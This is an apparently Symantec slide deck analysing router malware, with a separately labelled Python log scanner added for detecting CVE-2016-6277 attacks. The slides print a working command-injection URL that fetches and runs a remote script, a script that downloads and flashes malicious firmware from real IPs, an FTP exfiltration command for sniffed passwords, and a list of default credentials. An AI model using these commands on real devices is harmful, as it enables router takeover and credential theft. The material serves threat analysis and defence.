The router of all evil: More than just default passwords and silly scripts
Himanshu Anand & Chastine Menrige
Threat Analysis Engineer
Special Thanks
Copyright © 2014 Symantec Corporation
This work would not have been possible without the advice and support of:
• Karthikeyan Kasiviswanathan
• My whole Team @Symantec
• #MalwareMustDie
About Me
• Working as a Threat Analysis Engineer with IPS Operations
• Hobbies are exploit dev, exploit analysis, reversing, AI, CTF…
Introduction to Routers
Basic structure
[Diagram: Routing Engine; Packet Forwarding Engine; Packets in; Packets out]
Importance of Routers
• Serves as the default gateway for computers on the LAN
• Helps restrict traffic by limiting which hosts can communicate through broadcast
• Can act as a wireless access point, broadcasting a Wi-Fi signal to surrounding devices
• Serves as an ideal location for additional network services such as a firewall
Remember this
What’s common in the last 3 slides?
Why attack routers
• For DDoS
• Harvesting credentials
• Sniffing all the network traffic
• Injecting advertisements
Attacking Routers
Attack Vectors
1. Default password
2. DNS changer
3. Exploit frameworks
Default password
Top Default passwords
Top user names    Top passwords
root              admin
admin             root
DUP root          123456
ubnt              12345
access            ubnt
DUP admin         password
test              1234
oracle            test
postgres          qwerty
pi                raspberry
DNS changer
Famous Router Attacks
• Hacking-Team ]HT[ Takedown
Equation group dump
Types of malware
1. Script-based malware
2. Compiled binaries: ELF
3. Firmware
Script-based malware
– Shellshock exploitation (CVE-2014-6277, CVE-2014-6278, CVE-2014-7169, CVE-2014-7186 and CVE-2014-7187), which was used to compromise routers and infect them with ELF malware, as well as with Perl-based IRC bots.
Common traits
Compiled binaries
– Mirai
– a worm that targeted routers with default passwords
Firmware
• Netgear Router Attack
• Remote flashing of firmware
• The Netgear router attack (CVE-2016-6277) and the analysis of malicious firmware associated with it, which was flashed remotely, as well as the use of the Firmware Mod Kit (FMK) for the development of malicious firmware.
Exploit
• http://<IPADDRESS>/cgi-bin/;nvram$IFS\set$IFS\http_passwd;nvram$IFS\set$IFS\http_username;nvram$IFS\commit;sleep$IFS\2;cd$IFS\/tmp;wget$IFS\http:\/\/<IPADDRESS>\/h\/wrt\/uge.sh;chmod$IFS\777$IFS\/tmp/uge.sh;/bin/sh$IFS\/tmp/uge.sh
Shell Script
#cd /tmp
##!!!!!! wget http://178 .57.115.231:8081/h/wrt/custom_image_00021.bin &
# fetch the malicious firmware image in the background
wget http://94 .156.35.78/h/wrt/112.bin &
# remember the PID of the background download and block until it finishes
process_id=$!
wait $process_id
# write the downloaded image over the "linux" (firmware) partition, then reboot into it
write 112.bin linux
/sbin/reboot
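As an added defender-side example that is not part of the talk, the following Python check scans web-server access-log lines for the CVE-2016-6277 injection pattern shown on the Exploit slide (a /cgi-bin/ path whose tail starts with ";" and uses $IFS in place of spaces) and labels the attack stage each injected command corresponds to (credential reset, payload download, staging in /tmp). The log lines, the 192.0.2.x/198.51.100.x addresses and the stage labels are constructed for this example.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (Common Log Format); not from the talk.
SAMPLE_LOG = r'''192.0.2.10 - - [10/Dec/2016:10:00:01 +0000] "GET /cgi-bin/;nvram$IFS\set$IFS\http_passwd;nvram$IFS\commit;cd$IFS\/tmp;wget$IFS\http:\/\/198.51.100.5\/h\/wrt\/uge.sh HTTP/1.1" 404 0
192.0.2.11 - - [10/Dec/2016:10:00:02 +0000] "GET /cgi-bin/%3Bnvram%24IFS%5Cset%24IFS%5Chttp_username HTTP/1.1" 404 0
192.0.2.12 - - [10/Dec/2016:10:00:03 +0000] "GET /index.htm HTTP/1.1" 200 1024
192.0.2.13 - - [10/Dec/2016:10:00:04 +0000] "GET /cgi-bin/status.cgi?page=1 HTTP/1.1" 200 512'''

REQUEST_RE = re.compile(r'^(?P<client>\S+) \S+ \S+ \[[^\]]*\] "(?P<method>\S+) (?P<path>\S+) HTTP/')

# Substrings of the injected command chain mapped to the stage of the attack
# described in the talk (labels are this example's own wording).
STAGE_MARKERS = {
    "nvram set http_passwd": "admin credential reset",
    "nvram set http_username": "admin credential reset",
    "wget ": "payload download",
    "/tmp": "staging in /tmp",
    "/bin/sh": "stage execution",
}

def extract_commands(path: str):
    """Return the shell commands injected after /cgi-bin/;, or [] if the path is clean.

    The vulnerable handler runs the path tail as a shell command, so a tail that
    starts with ';' is the tell-tale; '$IFS' plus an optional backslash is the
    attacker's stand-in for a space, and '\\/' is an escaped slash."""
    decoded = unquote(path)            # attackers may percent-encode the payload
    if not decoded.startswith("/cgi-bin/;"):
        return []
    tail = decoded[len("/cgi-bin/"):]
    tail = re.sub(r'\$IFS\\?', " ", tail).replace("\\/", "/")
    return [c.strip() for c in tail.split(";") if c.strip()]

def scan_log(log_text: str):
    """Return one finding per request that matches the CVE-2016-6277 pattern."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        commands = extract_commands(m.group("path"))
        if not commands:
            continue
        joined = "; ".join(commands)
        stages = sorted({desc for marker, desc in STAGE_MARKERS.items() if marker in joined})
        findings.append({"client": m.group("client"), "commands": commands, "stages": stages})
    return findings

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding["client"], finding["stages"], finding["commands"])
```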
Binwalk
Directory structure (excerpt)
│ ├── fstab
│ ├── group -> /tmp/etc/group
│ ├── hosts -> /tmp/hosts
│ ├── init.d
│ │ ├── rcS
│ │ └── S01dummy
│ ├── ipkg.conf
Inside the Script
• “/usr/bin/wput $(cat /tmp/h5.sh | cut -c 1-4).$(date +%H-%M-%d-%m-%y)_$(cat /tmp/i5.sh).txt ftp://sammy:[email protected]/mnt/hdd/backup/ds/ &”. The command uploads a text file to the FTP server, with a filename of the form “<COUNTRY’S FIRST 4 LETTERS>.<DATE IN DD MM YY>_<IP ADDRESS OF THE DEVICE>.txt”, to “ftp://94.156.35.78/mnt/hdd/backup/ds/”.
What it was Uploading
• “/usr/sbin/dsniff -i $(nvram get lan_ifname) >/tmp/ds/ds5.txt”
• dsniff is run on the LAN interface to sniff passwords and write them to a text file. This is the file that is later uploaded to the FTP server.
Inside the FTP
Demo
Best Practices
• Keep the firmware of your router updated
• Do not use default passwords
• Use strong, unique passwords for the router login
Q&A
Thank you!
SYMANTEC PROPRIETARY/CONFIDENTIAL – INTERNAL USE ONLY. Copyright © 2014 Symantec Corporation. All rights reserved.
Himanshu Anand